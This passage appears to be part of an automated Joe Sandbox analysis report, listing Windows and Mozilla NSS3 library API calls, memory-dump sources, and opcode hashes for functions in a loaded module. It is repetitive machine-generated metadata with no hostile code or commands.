                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
                                                                                                                                                                                                                                                                                                                      • String ID: <+l
                                                                                                                                                                                                                                                                                                                      • API String ID: 2538134263-555380133
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 10bbcf58f7f44dcd4ad0b6f8befe20b0b069d6e7093f89d897011d2f6a82df74
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F11E7B6B001046BDB008E64DC01A9B77F9AB8426CF398138E81CD7780E776ED16C7A2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF2CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CF2CC7B), ref: 6CF2CD7A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF2CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CF2CD8E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF2CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CF2CDA5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF2CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CF2CDB8
                                                                                                                                                                                                                                                                                                                      • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CF2CCB5
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(6CFC14F4,6CFC02AC,00000090), ref: 6CF2CCD3
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(6CFC1588,6CFC02AC,00000090), ref: 6CF2CD2B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE49AC0: socket.WSOCK32(?,00000017,6CE499BE), ref: 6CE49AE6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE49AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CE499BE), ref: 6CE49AFC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50590: closesocket.WSOCK32(6CE49A8F,?,?,6CE49A8F,00000000), ref: 6CE50597
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                                                                                                                      • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                                                                                                                      • API String ID: 1231378898-412307543
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9c637272c4fdfaeffa54eda4373d2f9f649027c5f742943cb3b36686727df818
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 53b1327ea4d39caffaf79e6e7bd65e76cbc7526f6c3e79e2b739c2e0ad01b914
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c637272c4fdfaeffa54eda4373d2f9f649027c5f742943cb3b36686727df818
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24119AF1F102409FEB909F59ED0678337B8D346218F14982AE505CBB41E776C53887E2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CDF81DF
                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CDF8239
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CDF8255
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6CDF8260
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavememcpysqlite3_free
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1525636458-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: ed3e7b06f55806b1f85e7ac328ceff3fa17ddbf35e846309b6f9d6afdd7d426a
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 83e0bdaedcfa0725f7b2f42727a78157cfa27e19468cd918763c299a710e4015
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed3e7b06f55806b1f85e7ac328ceff3fa17ddbf35e846309b6f9d6afdd7d426a
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B91B171F51208CFEB04DFE1DC887AEBBB1BF06304F15412AD4269B664D7396A56CB82
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6CED1D8F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: TlsGetValue.KERNEL32 ref: 6CEC14E0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: EnterCriticalSection.KERNEL32 ref: 6CEC14F5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: PR_Unlock.NSS3 ref: 6CEC150D
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CED1DA6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CED1E13
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CED1ED0
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 84796498-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 40809a13b8939c8ee4fe209d191ec2cef1bdb65632d3bb0a9630976a75758d8e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 987041bb12c1a3e26fead47cc24df5576f9a3cff4c078a75c87b6ec61fabc76f
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40809a13b8939c8ee4fe209d191ec2cef1bdb65632d3bb0a9630976a75758d8e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D515875A0030A8FDB04CFD8C884BAEB7B6BF49328F254129E8199B751D731E946CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6CE085D2,00000000,?,?), ref: 6CF24FFD
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF2500C
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF250C8
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF250D6
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 4101233201-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 26efa4c7828e8691c8f68d584bbdc51f53ca46f5fdde0f68503a2d5b7ec7f740
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 354192B2A402168FCB18CF58DCD179AB7E1BF4431871D466DC84ACBB06E379E891CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3(00000000,?,?,?,6CE4FDFE), ref: 6CE4FFAD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDECA30: EnterCriticalSection.KERNEL32(?,?,?,6CE4F9C9,?,6CE4F4DA,6CE4F9C9,?,?,6CE1369A), ref: 6CDECA7A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDECA30: LeaveCriticalSection.KERNEL32(?), ref: 6CDECB26
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000008,00000000,?,?,?,6CE4FDFE), ref: 6CE4FFDF
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,?,?,6CE4FDFE), ref: 6CE5001C
                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,6CE4FDFE), ref: 6CE5006F
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$memsetsqlite3_initialize
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2358433136-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 161c21aa49b3a37407d39573667f48e5563a37ae55ac035866795c5eb1156b76
                                                                                                                                                                                                                                                                                                                      • Instruction ID: b11585d97e92990039cb6298609d9b2f1cd8939eb59184ca3537fd556e1a9d78
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 161c21aa49b3a37407d39573667f48e5563a37ae55ac035866795c5eb1156b76
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B041DF71F002059FDB08DFA4D885BAF7775FF46308F144429E80693B40DB3AAA25CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF37E10
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF37EA6
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF37EB5
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CF37ED8
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 4101233201-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                                                                                                                      • Instruction ID: f61a645603adb71f7aa426d2f53415e33cc07d189fdfb6972f92550b3085c8b1
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3331A4B2A00125CFDB04CF09D9909DABBA2BF8831871A816AC85C5B751EB71EC45CBD1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE8AE42), ref: 6CE730AA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE730C7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CE730E5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE73116
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE7312B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: PK11_DestroyObject.NSS3(?,?), ref: 6CE73154
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE7317E
                                                                                                                                                                                                                                                                                                                      • SECKEY_CopyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CEEDBBD), ref: 6CEEDFCF
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEEDFEE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE886D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE88716
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE886D0: TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE88727
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE886D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE8873B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE886D0: PR_Unlock.NSS3(?), ref: 6CE8876F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE886D0: PR_SetError.NSS3(00000000,00000000), ref: 6CE88787
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CEAF854
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CEAF868
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CEAF882
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: free.MOZGLUE(04C483FF,?,?), ref: 6CEAF889
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CEAF8A4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CEAF8AB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CEAF8C9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: free.MOZGLUE(280F10EC,?,?), ref: 6CEAF8D0
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,6CEEDBBD), ref: 6CEEDFFC
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,?,6CEEDBBD), ref: 6CEEE007
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Utilfree$CriticalSection$DeleteDestroy$Arena_CopyErrorK11_Private$AlgorithmAlloc_ArenaAuthenticateEnterFreeItem_ObjectPublicTag_UnlockValuememset
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3730430729-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: dd9d31093b3890d8b801d70de94bef6b5754f98af5b850397c21c0362f5d5a4f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2578b253581c8e550723f3de282df9ebb94c255b3d2b32063555a87dcbc7d36d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd9d31093b3890d8b801d70de94bef6b5754f98af5b850397c21c0362f5d5a4f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE3109B4A0020157D711DA79AC85B9B73B8AF9934CF240139E909C7B52FF35DA18C3E2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CE66C8D
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CE66CA9
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CE66CC0
                                                                                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CF88FE0), ref: 6CE66CFE
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2370200771-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: ae34e82ffc3f8dcd883b7881013ffa08a9c9e289e462023391627a0db7de54d4
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0e7438a7fc07459fe36f5fad1c7b26218e61cc39078dbbd2d50f06b990cc5772
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae34e82ffc3f8dcd883b7881013ffa08a9c9e289e462023391627a0db7de54d4
